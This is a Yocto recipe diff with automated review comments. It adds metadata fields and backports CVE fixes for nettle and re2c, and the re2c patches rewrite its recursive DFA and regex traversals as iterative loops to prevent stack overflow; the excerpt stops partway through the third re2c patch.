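Review bot: The tests added to testsuite/rsa-encrypt-test.c never exercise the two edges of the new range check: a negative input (the `mpz_sgn (gibberish) < 0` arm) and an input exactly equal to n (the `>= 0` boundary of `mpz_cmp`). The cases present are zero, gibberish + n, and n shifted left by 100 bits plus gibberish, so an off-by-one in the comparison would go unnoticed. Two more blocks starting with `mpz_set (bad_input, pub.n);` and `mpz_neg (bad_input, gibberish);`, each followed by the same three `ASSERT(!rsa_...)` calls, would pin both. The rsa.h comments state `0 <= m < n` as a requirement of `rsa_compute_root` and `rsa_compute_root_tr` rather than enforcing it there, so any caller outside the decrypt family still has to validate its own input; those callers are not visible in this patch.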
diff --git a/meta/recipes-support/nettle/nettle_3.5.1.bb b/meta/recipes-support/nettle/nettle_3.5.1.bb
index a9550ed033..192fd295e9 100644
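--- a/meta/recipes-support/nettle/nettle_3.5.1.bb
+++ b/meta/recipes-support/nettle/nettle_3.5.1.bb
@@ -1,4 +1,5 @@
 SUMMARY = "A low level cryptographic library"
+DESCRIPTION = "Nettle is a cryptographic library that is designed to fit easily in more or less any context: In crypto toolkits for object-oriented languages (C++, Python, Pike, ...), in applications like LSH or GNUPG, or even in kernel space."
 HOMEPAGE = "http://www.lysator.liu.se/~nisse/nettle/"
 DESCRIPTION = "It tries to solve a problem of providing a common set of \
 cryptographic algorithms for higher-level applications by implementing a \
@@ -17,6 +18,13 @@ SRC_URI = "${GNU_MIRROR}/${BPN}/${BP}.tar.gz \
  file://Add-target-to-only-build-tests-not-run-them.patch \
  file://run-ptest \
  file://check-header-files-of-openssl-only-if-enable_.patch \
+ file://CVE-2021-3580_1.patch \
+ file://CVE-2021-3580_2.patch \
+ file://CVE-2021-20305-1.patch \
+ file://CVE-2021-20305-2.patch \
+ file://CVE-2021-20305-3.patch \
+ file://CVE-2021-20305-4.patch \
+ file://CVE-2021-20305-5.patch \
  "
 
 SRC_URI_append_class-target = "\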
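Review bot: The `DESCRIPTION` added at new line 2 is dead, because the recipe still assigns `DESCRIPTION = "It tries to solve a problem of providing a common set of \` two lines further down and, with plain `=`, BitBake keeps the later assignment. Either drop the new line or fold its text into the existing assignment so that only one `DESCRIPTION` remains. The seven CVE patches appended to `SRC_URI` are applied in the order listed; whether the CVE-2021-3580 pair and the CVE-2021-20305 series touch overlapping files cannot be checked from this hunk, so confirm that `do_patch` applies them without fuzz.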
diff --git a/meta/recipes-support/npth/npth_1.6.bb b/meta/recipes-support/npth/npth_1.6.bb
index 88484acec3..94a3f00eac 100644
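--- a/meta/recipes-support/npth/npth_1.6.bb
+++ b/meta/recipes-support/npth/npth_1.6.bb
@@ -1,4 +1,5 @@
 SUMMARY = "New GNU Portable Threads library"
+DESCRIPTION = "nPth is a library to provide the GNU Pth API and thus a non-preemptive threads implementation. "
 HOMEPAGE = "https://www.gnu.org/software/pth/"
 SECTION = "libs"
 LICENSE = "LGPLv2+"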
diff --git a/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb b/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
index c539ecdbc6..5f1b73ee16 100644
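--- a/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
+++ b/meta/recipes-support/p11-kit/p11-kit_0.23.22.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Provides a way to load and enumerate PKCS#11 modules"
+DESCRIPTION = " Provides a standard configuration setup for installing PKCS#11 modules in such a way that they're discoverable. Also solves problems with coordinating the use of PKCS#11 by different components or libraries living in the same process."
+HOMEPAGE = "https://p11-glue.github.io/p11-glue/p11-kit.html"
 LICENSE = "BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://COPYING;md5=02933887f609807fbb57aa4237d14a50"
 
@@ -8,7 +10,7 @@ DEPENDS = "libtasn1 libtasn1-native libffi"
 
 DEPENDS_append = "${@' glib-2.0' if d.getVar('GTKDOC_ENABLED') == 'True' else ''}"
 
-SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23"
+SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23;protocol=https"
 SRCREV = "bd97afbfe28d5fbbde95ce36ff7a8834fc0291ee"
 S = "${WORKDIR}/git"
 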
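Review bot: The added `DESCRIPTION` string starts with a stray space (`DESCRIPTION = " Provides a standard configuration setup ...`), which is carried into the generated package metadata; drop the leading blank. The `;protocol=https` addition to `SRC_URI` needs nothing further in this hunk, since `SRCREV` already pins the commit that is fetched.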
diff --git a/meta/recipes-support/popt/popt_1.16.bb b/meta/recipes-support/popt/popt_1.16.bb
index 27e49c2ca2..0c0392d036 100644
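--- a/meta/recipes-support/popt/popt_1.16.bb
+++ b/meta/recipes-support/popt/popt_1.16.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Library for parsing command line options"
+DESCRIPTION = "Popt is a C library for parsing command line parameters. Popt was heavily influenced by the getopt() and getopt_long() functions, but it improves on them by allowing more powerful argument expansion. Popt can parse arbitrary argv[] style arrays and automatically set variables based on command line arguments."
 HOMEPAGE = "http://rpm5.org/"
 SECTION = "libs"
 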
diff --git a/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb b/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
index 8b9938f572..3401b7b39e 100644
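--- a/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
+++ b/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=751419260aa954499f7abaabaa882bbe"
 SRCREV = "834670317bd3f6e427e1ac461c07ada6b8936dfd"
 PV .= "+git${SRCPV}"
 
-SRC_URI = "git://git.yoctoproject.org/ptest-runner2 \
+SRC_URI = "git://git.yoctoproject.org/ptest-runner2;branch=master \
 "
 UPSTREAM_VERSION_UNKNOWN = "1"
 
@@ -27,3 +27,5 @@ do_compile () {
 do_install () {
  install -D -m 0755 ${S}/ptest-runner ${D}${bindir}/ptest-runner
 }
+
+RDEPENDS_${PN}_append_libc-glibc = " libgcc"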
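Review bot: The updated `SRC_URI` gains `;branch=master` but still fetches over the unauthenticated `git://` transport, while the p11-kit recipe in this same commit adds `;protocol=https`. `SRCREV` pins the commit, so this is defence in depth rather than an integrity hole, but for consistency the line could read `SRC_URI = "git://git.yoctoproject.org/ptest-runner2;branch=master;protocol=https \`. The new `RDEPENDS_${PN}_append_libc-glibc = " libgcc"` would also benefit from a one-line comment saying why libgcc is needed at runtime, since nothing in the hunk explains it.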
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch
new file mode 100644
index 0000000000..b7dcaefad3
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch
@@ -0,0 +1,347 @@
1From fd634998f813340768c333cdad638498602856e5 Mon Sep 17 00:00:00 2001
2From: Ulya Trofimovich <skvadrik@gmail.com>
3Date: Tue, 21 Apr 2020 21:28:32 +0100
4Subject: [PATCH] Rewrite recursion into iteration (Tarjan's SCC algorithm and
5 YYFILL states).
6
7This is to avoid stack overflow on large RE (especially on instrumented
8builds that have larger stack frames, like AddressSanitizer).
9
10Stack overflow reported by Agostino Sarubbo.
11Related to #219 "overflow-1.re test fails on system with small stack".
12
13Upstram-Status: Backport:
14https://github.com/skvadrik/re2c/commit/fd634998f813340768c333cdad638498602856e5
15
16CVE: CVE-2018-21232
17
18Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
19---
20diff --git a/src/dfa/fillpoints.cc b/src/dfa/fillpoints.cc
21--- a/src/dfa/fillpoints.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
22+++ b/src/dfa/fillpoints.cc (date 1646929180243)
23@@ -5,151 +5,186 @@
24
25 #include "src/dfa/dfa.h"
26
27-namespace re2c
28-{
29+
30+/*
31+ * note [finding strongly connected components of DFA]
32+ *
33+ * A slight modification of Tarjan's algorithm.
34+ *
35+ * The algorithm traverses the DFA in depth-first order. It maintains a stack
36+ * of states that have already been visited but haven't been assigned to an SCC
37+ * yet. For each state the algorithm calculates 'lowlink': index of the highest
38+ * ancestor state reachable in one step from a descendant of this state.
39+ * Lowlink is used to determine when a set of states should be popped off stack
40+ * into a new SCC.
41+ *
42+ * We use lowlink to hold different kinds of information:
43+ * - values in range [0 .. stack size] mean that the state is on stack (a
44+ * link to a state with the smallest index reachable from this one)
45+ * - SCC_UND means that this state has not been visited yet
46+ * - SCC_INF means that this state has already been popped off stack
47+ *
48+ * We use stack size (rather than topological sort index) as a unique index of
49+ * the state on stack. This is safe because the indices of states on stack are
50+ * unique and less than the indices of states that have been popped off stack
51+ * (SCC_INF).
52+ */
53+
54+namespace re2c {
55+ namespace {
56
57-static const size_t SCC_INF = std::numeric_limits<size_t>::max();
58-static const size_t SCC_UND = SCC_INF - 1;
59+ static const size_t SCC_INF = std::numeric_limits<size_t>::max();
60+ static const size_t SCC_UND = SCC_INF - 1;
61
62-static bool loopback(size_t node, size_t narcs, const size_t *arcs)
63-{
64- for (size_t i = 0; i < narcs; ++i)
65- {
66- if (arcs[i] == node)
67- {
68- return true;
69- }
70- }
71- return false;
72-}
73+ static bool loopback(size_t state, size_t narcs, const size_t *arcs)
74+ {
75+ for (size_t i = 0; i < narcs; ++i) {
76+ if (arcs[i] == state) return true;
77+ }
78+ return false;
79+ }
80
81-/*
82- * node [finding strongly connected components of DFA]
83- *
84- * A slight modification of Tarjan's algorithm.
85- *
86- * The algorithm walks graph in deep-first order. It maintains a stack
87- * of nodes that have already been visited but haven't been assigned to
88- * SCC yet. For each node the algorithm calculates 'lowlink': index of
89- * the highest ancestor node reachable in one step from a descendant of
90- * the node. Lowlink is used to determine when a set of nodes should be
91- * popped off the stack into a new SCC.
92- *
93- * We use lowlink to hold different kinds of information:
94- * - values in range [0 .. stack size] mean that this node is on stack
95- * (link to a node with the smallest index reachable from this one)
96- * - SCC_UND means that this node has not been visited yet
97- * - SCC_INF means that this node has already been popped off stack
98- *
99- * We use stack size (rather than topological sort index) as unique index
100- * of a node on stack. This is safe because indices of nodes on stack are
101- * still unique and less than indices of nodes that have been popped off
102- * stack (SCC_INF).
103- *
104- */
105-static void scc(
106- const dfa_t &dfa,
107- std::stack<size_t> &stack,
108- std::vector<size_t> &lowlink,
109- std::vector<bool> &trivial,
110- size_t i)
111-{
112- const size_t link = stack.size();
113- lowlink[i] = link;
114- stack.push(i);
115+ struct StackItem {
116+ size_t state; // current state
117+ size_t symbol; // next arc to be visited in this state
118+ size_t link; // Tarjan's "lowlink"
119+ };
120+
121+// Tarjan's algorithm
122+ static void scc(const dfa_t &dfa, std::vector<bool> &trivial,
123+ std::vector<StackItem> &stack_dfs)
124+ {
125+ std::vector<size_t> lowlink(dfa.states.size(), SCC_UND);
126+ std::stack<size_t> stack;
127+
128+ StackItem x0 = {0, 0, 0};
129+ stack_dfs.push_back(x0);
130+
131+ while (!stack_dfs.empty()) {
132+ const size_t i = stack_dfs.back().state;
133+ size_t c = stack_dfs.back().symbol;
134+ size_t link = stack_dfs.back().link;
135+ stack_dfs.pop_back();
136+
137+ const size_t *arcs = dfa.states[i]->arcs;
138+
139+ if (c == 0) {
140+ // DFS recursive enter
141+ //DASSERT(lowlink[i] == SCC_UND);
142+ link = lowlink[i] = stack.size();
143+ stack.push(i);
144+ }
145+ else {
146+ // DFS recursive return (from one of successor states)
147+ const size_t j = arcs[c - 1];
148+ //DASSERT(lowlink[j] != SCC_UND);
149+ lowlink[i] = std::min(lowlink[i], lowlink[j]);
150+ }
151
152- const size_t *arcs = dfa.states[i]->arcs;
153- for (size_t c = 0; c < dfa.nchars; ++c)
154- {
155- const size_t j = arcs[c];
156- if (j != dfa_t::NIL)
157- {
158- if (lowlink[j] == SCC_UND)
159- {
160- scc(dfa, stack, lowlink, trivial, j);
161- }
162- if (lowlink[j] < lowlink[i])
163- {
164- lowlink[i] = lowlink[j];
165- }
166- }
167- }
168+ // find the next successor state that hasn't been visited yet
169+ for (; c < dfa.nchars; ++c) {
170+ const size_t j = arcs[c];
171+ if (j != dfa_t::NIL) {
172+ if (lowlink[j] == SCC_UND) {
173+ break;
174+ }
175+ lowlink[i] = std::min(lowlink[i], lowlink[j]);
176+ }
177+ }
178
179- if (lowlink[i] == link)
180- {
181- // SCC is non-trivial (has loops) iff it either:
182- // - consists of multiple nodes (they all must be interconnected)
183- // - consists of single node which loops back to itself
184- trivial[i] = i == stack.top()
185- && !loopback(i, dfa.nchars, arcs);
186+ if (c < dfa.nchars) {
187+ // recurse into the next successor state
188+ StackItem x1 = {i, c + 1, link};
189+ stack_dfs.push_back(x1);
190+ StackItem x2 = {arcs[c], 0, SCC_UND};
191+ stack_dfs.push_back(x2);
192+ }
193+ else if (lowlink[i] == link) {
194+ // all successors have been visited
195+ // SCC is non-trivial (has loops) if either:
196+ // - it contains multiple interconnected states
197+ // - it contains a single self-looping state
198+ trivial[i] = i == stack.top() && !loopback(i, dfa.nchars, arcs);
199
200- size_t j;
201- do
202- {
203- j = stack.top();
204- stack.pop();
205- lowlink[j] = SCC_INF;
206- }
207- while (j != i);
208- }
209-}
210+ for (;;) {
211+ const size_t j = stack.top();
212+ stack.pop();
213+ lowlink[j] = SCC_INF;
214+ if (i == j) break;
215+ }
216+ }
217+ }
218+ }
219
220-static void calc_fill(
221- const dfa_t &dfa,
222- const std::vector<bool> &trivial,
223- std::vector<size_t> &fill,
224- size_t i)
225-{
226- if (fill[i] == SCC_UND)
227- {
228- fill[i] = 0;
229- const size_t *arcs = dfa.states[i]->arcs;
230- for (size_t c = 0; c < dfa.nchars; ++c)
231- {
232- const size_t j = arcs[c];
233- if (j != dfa_t::NIL)
234- {
235- calc_fill(dfa, trivial, fill, j);
236- size_t max = 1;
237- if (trivial[j])
238- {
239- max += fill[j];
240- }
241- if (max > fill[i])
242- {
243- fill[i] = max;
244- }
245- }
246- }
247- }
248-}
249-
250-void fillpoints(const dfa_t &dfa, std::vector<size_t> &fill)
251-{
252- const size_t size = dfa.states.size();
253-
254- // find DFA states that belong to non-trivial SCC
255- std::stack<size_t> stack;
256- std::vector<size_t> lowlink(size, SCC_UND);
257- std::vector<bool> trivial(size, false);
258- scc(dfa, stack, lowlink, trivial, 0);
259-
260- // for each DFA state, calculate YYFILL argument:
261- // maximal path length to the next YYFILL state
262- fill.resize(size, SCC_UND);
263- calc_fill(dfa, trivial, fill, 0);
264+ static void calc_fill(const dfa_t &dfa, const std::vector<bool> &trivial,
265+ std::vector<StackItem> &stack_dfs, std::vector<size_t> &fill)
266+ {
267+ const size_t nstates = dfa.states.size();
268+ fill.resize(nstates, SCC_UND);
269+
270+ StackItem x0 = {0, 0, SCC_INF};
271+ stack_dfs.push_back(x0);
272+
273+ while (!stack_dfs.empty()) {
274+ const size_t i = stack_dfs.back().state;
275+ size_t c = stack_dfs.back().symbol;
276+ stack_dfs.pop_back();
277+
278+ const size_t *arcs = dfa.states[i]->arcs;
279+
280+ if (c == 0) {
281+ // DFS recursive enter
282+ if (fill[i] != SCC_UND) continue;
283+ fill[i] = 0;
284+ }
285+ else {
286+ // DFS recursive return (from one of successor states)
287+ const size_t j = arcs[c - 1];
288+ //DASSERT(fill[i] != SCC_UND && fill[j] != SCC_UND);
289+ fill[i] = std::max(fill[i], 1 + (trivial[j] ? fill[j] : 0));
290+ }
291+
292+ // find the next successor state that hasn't been visited yet
293+ for (; c < dfa.nchars; ++c) {
294+ const size_t j = arcs[c];
295+ if (j != dfa_t::NIL) break;
296+ }
297+
298+ if (c < dfa.nchars) {
299+ // recurse into the next successor state
300+ StackItem x1 = {i, c + 1, SCC_INF};
301+ stack_dfs.push_back(x1);
302+ StackItem x2 = {arcs[c], 0, SCC_INF};
303+ stack_dfs.push_back(x2);
304+ }
305+ }
306
307- // The following states must trigger YYFILL:
308- // - inital state
309- // - all states in non-trivial SCCs
310- // for other states, reset YYFILL argument to zero
311- for (size_t i = 1; i < size; ++i)
312- {
313- if (trivial[i])
314- {
315- fill[i] = 0;
316- }
317- }
318-}
319+ // The following states must trigger YYFILL:
320+ // - inital state
321+ // - all states in non-trivial SCCs
322+ // for other states, reset YYFILL argument to zero
323+ for (size_t i = 1; i < nstates; ++i) {
324+ if (trivial[i]) {
325+ fill[i] = 0;
326+ }
327+ }
328+ }
329
330+ } // anonymous namespace
331+
332+ void fillpoints(const dfa_t &dfa, std::vector<size_t> &fill)
333+ {
334+ const size_t nstates = dfa.states.size();
335+ std::vector<bool> trivial(nstates, false);
336+ std::vector<StackItem> stack_dfs;
337+ stack_dfs.reserve(nstates);
338+
339+ // find DFA states that belong to non-trivial SCC
340+ scc(dfa, trivial, stack_dfs);
341+
342+ // for each DFA state, calculate YYFILL argument:
343+ // maximal path length to the next YYFILL state
344+ calc_fill(dfa, trivial, stack_dfs, fill);
345+ }
346+
347 } // namespace re2c
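Review bot: The patch header's status tag is misspelled as `Upstram-Status: Backport:` (CVE-2018-21232-2.patch has `Upstream-Stauts:`), so tooling or reviewers searching for `Upstream-Status:` will not find it; the conventional form is `Upstream-Status: Backport [https://github.com/skvadrik/re2c/commit/fd634998f813340768c333cdad638498602856e5]`. In the code itself, the rewritten `scc` and `calc_fill` now call `std::min` and `std::max`; the include block of fillpoints.cc sits above the hunk and is not visible here, so confirm that `<algorithm>` is included. The commented-out `//DASSERT(...)` lines should either be dropped or replaced with an assertion macro that this re2c version provides, so the invariants they describe are not left as dead text.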
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch
new file mode 100644
index 0000000000..820a6decbc
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch
@@ -0,0 +1,243 @@
1From 7b5643476bd99c994c4f51b8143f942982d85521 Mon Sep 17 00:00:00 2001
2From: Ulya Trofimovich <skvadrik@gmail.com>
3Date: Wed, 22 Apr 2020 22:37:24 +0100
4Subject: [PATCH] Rewrite recursion into iteration (fixed tags computation).
5
6This is to avoid stack overflow on large RE (especially on instrumented
7builds that have larger stack frames, like AddressSanitizer).
8
9Partial fix for #219 "overflow-1.re test fails on system with small stack".
10
11Upstream-Stauts: Backport:
12https://github.com/skvadrik/re2c/commit/7b5643476bd99c994c4f51b8143f942982d85521
13
14CVE: CVE-2018-21232
15
16Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
17---
18diff --git a/src/re/tag.cc b/src/re/tag.cc
19--- a/src/re/tag.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
20+++ b/src/re/tag.cc (date 1646986908580)
21@@ -6,7 +6,7 @@
22 {
23
24 const size_t Tag::RIGHTMOST = std::numeric_limits<size_t>::max();
25-const size_t Tag::VARDIST = std::numeric_limits<size_t>::max();
26+const uint32_t Tag::VARDIST = std::numeric_limits<uint32_t>::max();
27 const size_t Tag::FICTIVE = Tag::RIGHTMOST - 1;
28
29 } // namespace re2c
30
31
32diff --git a/src/re/tag.h b/src/re/tag.h
33--- a/src/re/tag.h (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
34+++ b/src/re/tag.h (date 1646986922376)
35@@ -19,7 +19,7 @@
36 struct Tag
37 {
38 static const size_t RIGHTMOST;
39- static const size_t VARDIST;
40+ static const uint32_t VARDIST;
41 static const size_t FICTIVE;
42
43 const std::string *name;
44
45
46diff --git a/src/re/fixed_tags.cc b/src/re/fixed_tags.cc
47--- a/src/re/fixed_tags.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
48+++ b/src/re/fixed_tags.cc (date 1646991137317)
49@@ -7,78 +7,131 @@
50 #include "src/re/tag.h"
51
52 namespace re2c {
53+namespace {
54
55 /* note [fixed and variable tags]
56 *
57- * If distance between two tags is constant (equal for all strings that
58- * match the given regexp), then lexer only needs to track one of them:
59- * the second tag equals the first tag plus static offset.
60+ * If distance between two tags is constant (equal for all strings that match
61+ * the given regexp), then lexer only needs to track one of them: the second
62+ * tag equals the first tag plus static offset.
63 *
64- * However, this optimization is applied only to tags in top-level
65- * concatenation, because other tags may be uninitialized and we don't
66- * want to mess with conditional calculation of fixed tags.
67- *
68+ * This optimization is applied only to tags in top-level concatenation,
69+ * because in other cases the base tag may be NULL, and the calculation of
70+ * the fixed tag value is not as simple as substracting a fixed offset.
71 * Furthermore, fixed tags are fobidden with generic API because it cannot
72- * express fixed offsets.
73- *
74- * Tags with history also cannot be fixed.
75+ * express fixed offsets. M-tags (with history) also cannot be fixed.
76 *
77 * Another special case is fictive tags (those that exist only to impose
78- * hierarchical laws of POSIX disambiguation). We treat them as fixed
79- * in order to suppress code generation.
80+ * hierarchical laws of POSIX disambiguation). We treat them as fixed in order
81+ * to suppress code generation.
82 */
83
84-static void find_fixed_tags(RE *re, std::vector<Tag> &tags,
85- size_t &dist, size_t &base, bool toplevel)
86+struct StackItem {
87+ RE *re; // current sub-RE
88+ uint32_t dist; // distance backup for alternative, unused for other RE
89+ uint8_t succ; // index of the next successor to be visited
90+ bool toplevel; // if this sub-RE is in top-level concatenation
91+};
92+
93+static void find_fixed_tags(RESpec &spec, std::vector<StackItem> &stack, RE *re0)
94 {
95- switch (re->type) {
96- case RE::NIL: break;
97- case RE::SYM:
98- if (dist != Tag::VARDIST) ++dist;
99- break;
100- case RE::ALT: {
101- size_t d1 = dist, d2 = dist;
102- find_fixed_tags(re->alt.re1, tags, d1, base, false);
103- find_fixed_tags(re->alt.re2, tags, d2, base, false);
104- dist = (d1 == d2) ? d1 : Tag::VARDIST;
105- break;
106- }
107- case RE::CAT:
108- find_fixed_tags(re->cat.re2, tags, dist, base, toplevel);
109- find_fixed_tags(re->cat.re1, tags, dist, base, toplevel);
110- break;
111- case RE::ITER:
112- find_fixed_tags(re->iter.re, tags, dist, base, false);
113- dist = Tag::VARDIST;
114- break;
115- case RE::TAG: {
116- // see note [fixed and variable tags]
117- Tag &tag = tags[re->tag.idx];
118- if (fictive(tag)) {
119- tag.base = tag.dist = 0;
120- } else if (toplevel && dist != Tag::VARDIST && !history(tag)) {
121- tag.base = base;
122- tag.dist = dist;
123- } else if (toplevel) {
124- base = re->tag.idx;
125- dist = 0;
126- }
127- if (trailing(tag)) dist = 0;
128- break;
129- }
130- }
131+ static const uint32_t VARDIST = Tag::VARDIST;
132+ bool toplevel = spec.opts->input_api != INPUT_CUSTOM;
133+
134+ // base tag, intially the fake "rightmost tag" (the end of RE)
135+ size_t base = Tag::RIGHTMOST;
136+
137+ // the distance to the nearest top-level tag to the right (base tag)
138+ uint32_t dist = 0;
139+
140+ const StackItem i0 = {re0, VARDIST, 0, toplevel};
141+ stack.push_back(i0);
142+
143+ while (!stack.empty()) {
144+ const StackItem i = stack.back();
145+ stack.pop_back();
146+ RE *re = i.re;
147+
148+ if (re->type == RE::SYM) {
149+ if (dist != VARDIST) ++dist;
150+ }
151+ else if (re->type == RE::ALT) {
152+ if (i.succ == 0) {
153+ // save the current distance on stack (from the alternative end
154+ // to base) and recurse into the left sub-RE
155+ StackItem k = {re, dist, 1, i.toplevel};
156+ stack.push_back(k);
157+ StackItem j = {re->alt.re1, VARDIST, 0, false};
158+ stack.push_back(j);
159+ }
160+ else if (i.succ == 1) {
161+ // save the current distance on stack (from the left sub-RE to
162+ // base), reset distance to the distance popped from stack (from
163+ // the alternative end to base), recurse into the right sub-RE
164+ StackItem k = {re, dist, 2, i.toplevel};
165+ stack.push_back(k);
166+ StackItem j = {re->alt.re2, VARDIST, 0, false};
167+ stack.push_back(j);
168+ dist = i.dist;
169+ }
170+ else {
171+ // both sub-RE visited, compare the distance on stack (from the
172+ // left sub-RE to base) to the current distance (from the right
173+ // sub-RE to base), if not equal set variable distance
174+ dist = (i.dist == dist) ? i.dist : VARDIST;
175+ }
176+ }
177+ else if (re->type == RE::ITER) {
178+ if (i.succ == 0) {
179+ // recurse into the sub-RE
180+ StackItem k = {re, VARDIST, 1, i.toplevel};
181+ stack.push_back(k);
182+ StackItem j = {re->iter.re, VARDIST, 0, false};
183+ stack.push_back(j);
184+ }
185+ else {
186+ // sub-RE visited, assume unknown number of iterations
187+ // TODO: find precise distance for fixed repetition counter
188+ dist = VARDIST;
189+ }
190+ }
191+ else if (re->type == RE::CAT) {
192+ // the right sub-RE is pushed on stack after the left sub-RE and
193+ // visited earlier (because distance is computed from right to left)
194+ StackItem j1 = {re->cat.re1, VARDIST, 0, i.toplevel};
195+ stack.push_back(j1);
196+ StackItem j2 = {re->cat.re2, VARDIST, 0, i.toplevel};
197+ stack.push_back(j2);
198+ }
199+ else if (re->type == RE::TAG) {
200+ // see note [fixed and variable tags]
201+ Tag &tag = spec.tags[re->tag.idx];
202+ if (fictive(tag)) {
203+ tag.base = tag.dist = 0;
204+ }
205+ else if (i.toplevel && dist != VARDIST && !history(tag)) {
206+ tag.base = base;
207+ tag.dist = dist;
208+ }
209+ else if (i.toplevel) {
210+ base = re->tag.idx;
211+ dist = 0;
212+ }
213+ if (trailing(tag)) {
214+ dist = 0;
215+ }
216+ }
217+ }
218 }
219+
220+} // anonymous namespace
221
222-void find_fixed_tags(RESpec &spec)
223-{
224- const bool generic = spec.opts->input_api == INPUT_CUSTOM;
225- std::vector<RE*>::iterator
226- i = spec.res.begin(),
227- e = spec.res.end();
228- for (; i != e; ++i) {
229- size_t base = Tag::RIGHTMOST, dist = 0;
230- find_fixed_tags(*i, spec.tags, dist, base, !generic);
231- }
232-}
233+ void find_fixed_tags(RESpec &spec)
234+ {
235+ std::vector<StackItem> stack;
236+ for (std::vector<RE*>::iterator i = spec.res.begin(); i != spec.res.end(); ++i) {
237+ find_fixed_tags(spec, stack, *i);
238+ }
239+ }
240
241-} // namespace re2c
242+} // namespace re2c
243\ No newline at end of file
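Review bot: `Tag::VARDIST` is narrowed from `size_t` to `uint32_t` in tag.cc and tag.h, but the hunks shown do not touch the `dist` field of `Tag` or any other user of the constant. Confirm that every place in the patched tree which stores or tests a variable distance agrees on the new width; code that builds the sentinel independently from `std::numeric_limits<size_t>::max()` would no longer compare equal on 64-bit builds, and that cannot be checked from this patch. The last hunk also ends with `\ No newline at end of file`, which strips the trailing newline from fixed_tags.cc; keeping the newline avoids a needless difference from upstream.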
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch
new file mode 100644
index 0000000000..f942e21cba
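--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch
@@ -0,0 +1,156 @@
+From 4d9c809355b574f2a58eac119f5e076c48e4d1e2 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Thu, 23 Apr 2020 22:16:51 +0100
+Subject: [PATCH] Rewrite recursion into iteration (nullable RE).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstream-Status: Backport:
+https://github.com/skvadrik/re2c/commit/4d9c809355b574f2a58eac119f5e076c48e4d1e2
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/re/nullable.cc b/src/re/nullable.cc
+--- a/src/re/nullable.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/nullable.cc (date 1647253886226)
+@@ -9,43 +9,100 @@
+ #include "src/re/tag.h"
+
+ namespace re2c {
++ namespace {
++
++ struct StackItem {
++ const RE *re; // current sub-RE
++ uint8_t succ; // index of the next sucessor to be visited
++ };
+
+-static bool nullable(const RESpec &spec, const RE *re, bool &trail)
+-{
+- if (trail) return true;
++ static bool nullable(const RESpec &spec, std::vector<StackItem> &stack, const RE *re0)
++ {
++ // the "nullable" status of the last sub-RE visited by DFS
++ bool null = false;
+
+- switch (re->type) {
+- case RE::NIL: return true;
+- case RE::SYM: return false;
+- case RE::ITER:
+- return nullable(spec, re->iter.re, trail);
+- case RE::TAG:
+- trail |= trailing(spec.tags[re->tag.idx]);
+- return true;
+- case RE::ALT:
+- return nullable(spec, re->alt.re1, trail)
+- || nullable(spec, re->alt.re2, trail);
+- case RE::CAT:
+- return nullable(spec, re->cat.re1, trail)
+- && nullable(spec, re->cat.re2, trail);
+- }
+- return false; /* unreachable */
+-}
++ const StackItem i0 = {re0, 0};
++ stack.push_back(i0);
++
++ while (!stack.empty()) {
++ const StackItem i = stack.back();
++ stack.pop_back();
++
++ const RE *re = i.re;
++ if (re->type == RE::NIL) {
++ null = true;
++ }
++ else if (re->type == RE::SYM) {
++ null = false;
++ }
++ else if (re->type == RE::TAG) {
++ null = true;
+
+-/*
+- * warn about rules that match empty string
+- * (including rules with nonempty trailing context)
+- * false positives on partially self-shadowed rules like [^]?
+- */
+-void warn_nullable(const RESpec &spec, const std::string &cond)
+-{
+- const size_t nre = spec.res.size();
+- for (size_t i = 0; i < nre; ++i) {
+- bool trail = false;
+- if (nullable(spec, spec.res[i], trail)) {
+- spec.warn.match_empty_string(spec.rules[i].code->fline, cond);
+- }
+- }
+-}
++ // Trailing context is always in top-level concatenation, and sub-RE
++ // are visited from left to right. Since we are here, sub-RE to the
++ // left of the trailing context is nullable (otherwise we would not
++ // recurse into the right sub-RE), therefore the whole RE is nullable.
++ if (trailing(spec.tags[re->tag.idx])) {
++ //DASSERT(stack.size() == 1 && stack.back().re->type == RE::CAT);
++ stack.pop_back();
++ break;
++ }
++ }
++ else if (re->type == RE::ALT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 1};
++ stack.push_back(k);
++ StackItem j = {re->alt.re1, 0};
++ stack.push_back(j);
++ }
++ else if (!null) {
++ // if the left sub-RE is nullable, so is alternative, so stop
++ // recursion; otherwise recurse into the right sub-RE
++ StackItem j = {re->alt.re2, 0};
++ stack.push_back(j);
++ }
++ }
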